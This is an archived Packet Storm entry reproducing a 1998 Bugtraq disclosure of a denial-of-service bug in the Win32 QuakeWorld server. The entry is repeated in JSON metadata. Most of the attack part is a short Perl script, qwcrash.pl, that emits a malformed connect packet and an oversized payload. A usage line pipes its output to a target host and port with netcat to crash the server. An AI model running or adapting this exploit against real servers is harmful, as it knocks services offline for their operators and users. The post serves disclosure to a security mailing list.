ID PACKETSTORM:15279 Type packetstorm Reporter Packet Storm Modified 1999-08-17T00:00:00
Description
`Date: Wed, 4 Nov 1998 16:30:18 +0100
From: Paul Boehm <pb@INSECURITY.NET>
To: BUGTRAQ@netspace.org
Subject: quakeworld/win32 DoS
the output of the attached perl script, when piped through netcat,
crashes quakeworld for win32. As i don't have any win32 debuging
tools and the problem doesn't occur under linux i can't further
investigate this. Zoid (idsoftware) has been mailed some weeks ago,
but he didn't look very interested...
cya,
paul
--
.----------------------------------------------------------------------.
| mail: pb@insecurity.net :: url: http://paul.boehm.org |
| irc: infected :: pgp: finger pb@insecurity.net | pgp -fka |
\.....Linux is like a wigwam - no windows, no gates, apache inside..../
#!/usr/bin/perl
# qwsvwin32-crasher by infected@cia.at
#
# usage : ./qwcrash | nc -u host port
# result: qwsv for win32 should exit with: ERROR: NET_GetPacket: Unknown error
# reason: ? (winsock?)
#
#
print chr(255) x 4 . "getchallenge\n";
print chr(255) x 4 . 'connect 28 26914 1960732995
"\noaim\0\msg\1\rate\2500\team\bla\topcolor\3\bottomcolor\11\skin\bla\pmodel\33168\emodel\6967\name\bla"' . "\n";
print "x" x 4400;
`
{"hash": "e56b8f2b1e6feecafa9a377b8cb415b6505116ab2baeadc8a59136bfa332e538", "edition": 1, "references": [], "objectVersion": "1.2", "viewCount": 0, "type": "packetstorm", "description": "", "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/15279/qwcrash.pl.html", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "165f8c957af500ab010640678193f53a"}, {"key": "modified", "hash": "9c9724194c79e3f95cb8597d199abea6"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "9c9724194c79e3f95cb8597d199abea6"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "7e63640ffbb0546f3e2929f550c8818d"}, {"key": "sourceData", "hash": "a0a67f1ef7b8a8ee7a05bf870eda7db8"}, {"key": "sourceHref", "hash": "3e6f4ed04311222e2adddf744305d688"}, {"key": "title", "hash": "ced5d413253e2dfc3f08f44081f60f17"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "published": "1999-08-17T00:00:00", "modified": "1999-08-17T00:00:00", "title": "qwcrash.pl", "cvelist": [], "sourceHref": "https://packetstormsecurity.com/files/download/15279/qwcrash.pl", "history": [], "reporter": "Packet Storm", "lastseen": "2016-11-03T10:28:29", "cvss": {"vector": "NONE", "score": 0.0}, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "sourceData": "`Date: Wed, 4 Nov 1998 16:30:18 +0100 \nFrom: Paul Boehm <pb@INSECURITY.NET> \nTo: BUGTRAQ@netspace.org \nSubject: quakeworld/win32 DoS \n \nthe output of the attached perl script, when piped through netcat, \ncrashes quakeworld for win32. As i don't have any win32 debuging \ntools and the problem doesn't occur under linux i can't further \ninvestigate this. Zoid (idsoftware) has been mailed some weeks ago, \nbut he didn't look very interested... \n \ncya, \npaul \n \n-- \n.----------------------------------------------------------------------. \n| mail: pb@insecurity.net :: url: http://paul.boehm.org | \n| irc: infected :: pgp: finger pb@insecurity.net | pgp -fka | \n\\.....Linux is like a wigwam - no windows, no gates, apache inside..../ \n \n \n#!/usr/bin/perl \n# qwsvwin32-crasher by infected@cia.at \n# \n# usage : ./qwcrash | nc -u host port \n# result: qwsv for win32 should exit with: ERROR: NET_GetPacket: Unknown error \n# reason: ? (winsock?) \n# \n# \n \nprint chr(255) x 4 . \"getchallenge\\n\"; \nprint chr(255) x 4 . 'connect 28 26914 1960732995 \n\"\\noaim\\0\\msg\\1\\rate\\2500\\team\\bla\\topcolor\\3\\bottomcolor\\11\\skin\\bla\\pmodel\\33168\\emodel\\6967\\name\\bla\"' . \"\\n\"; \nprint \"x\" x 4400; \n \n`\n", "id": "PACKETSTORM:15279"}
